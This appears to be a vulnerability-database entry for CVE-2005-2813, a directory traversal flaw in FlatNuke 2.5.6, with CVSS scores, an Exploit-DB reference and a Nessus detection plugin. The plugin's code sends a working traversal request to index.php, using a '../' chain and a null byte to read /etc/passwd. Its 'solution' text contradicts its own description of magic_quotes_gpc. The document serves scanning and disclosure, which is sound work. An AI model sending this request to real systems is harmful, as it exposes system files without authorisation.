Vulnerabilities > CVE-2005-2813 - Directory Traversal vulnerability in Flatnuke 2.5.6

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
flatnuke
nessus
exploit available
NVD
Published: 2005-09-07
Updated: 2018-10-19

Summary

Directory traversal vulnerability in FlatNuke 2.5.6 and possibly earlier allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) characters in the id parameter to the read mod in index.php.

Vulnerable Configurations

Part Description Count
Application
Flatnuke
1

Exploit-Db

descriptionFlatNuke 2.5.6 ID Parameter Directory Traversal Vulnerability. CVE-2005-2813 . Webapps exploit for php platform
idEDB-ID:26212
last seen2016-02-03
modified2005-08-31
published2005-08-31
reporterrgod
sourcehttps://www.exploit-db.com/download/26212/
titleFlatNuke 2.5.6 ID Parameter Directory Traversal Vulnerability

Nessus

NASL familyCGI abuses
NASL idFLATNUKE_ID_DIR_TRAVERSAL.NASL
descriptionThe remote host is running FlatNuke, a content management system written in PHP and using flat files rather than a database for its storage. The version of FlatNuke installed on the remote host suffers fails to remove directory traversal sequences user input to the
last seen2020-06-01
modified2020-06-02
plugin id20293
published2005-12-12
reporterThis script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/20293
titleFlatNuke index.php id Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(20293);
  script_version("1.24");
  script_cvs_date("Date: 2018/11/15 20:50:17");

  script_cve_id("CVE-2005-2813", "CVE-2005-4208");
  script_bugtraq_id(14702, 15796);

  script_name(english:"FlatNuke index.php id Parameter Traversal Arbitrary File Access");
  script_summary(english:"Checks for id parameter directory traversal vulnerability in FlatNuke");
 
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
directory traversal vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host is running FlatNuke, a content management system
written in PHP and using flat files rather than a database for its
storage. 

The version of FlatNuke installed on the remote host suffers fails to
remove directory traversal sequences user input to the 'id' parameter
of the 'index.php' script.  Provided PHP's 'magic_quotes_gpc' setting
is enabled, an attacker can leverage this flaw to read arbitrary files
on the remote host subject to the privileges of the web server user
id." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Dec/107" );
  script_set_attribute(attribute:"solution", value:
"Enable PHP's 'magic_quotes_gpc' setting." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/12");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/30");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/flatnuke", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Try to exploit the flaw to read a file.
  file = "../../../../../../../../../../../../../etc/passwd";
  u = string(
      dir, "/?",
      "mod=read&",
      "id=", file, "%00"
    );
  r = http_send_recv3(port:port, method: "GET", item: u);
  if (isnull(r)) exit(0);

  # There's a problem if there's an entry for root.
  if (egrep(pattern:"root:.*:0:[01]:", string: r[2]))
  {
    output = strstr(r[2], 'read.png" alt="Read"> ');
    if (output) output = output - 'read.png" alt="Read"> ';
    if (output) output = output - strstr(output, '</font></td>');
    if (isnull(output)) output = r[2];
    output = data_protection::redact_etc_passwd(output:output);
    report = '\n';
    foreach line (split(output, keep: 0))
      report = strcat(report, clean_string(s: line), '\n');
    security_warning(port:port, extra: report);
    exit(0);
  }
}

References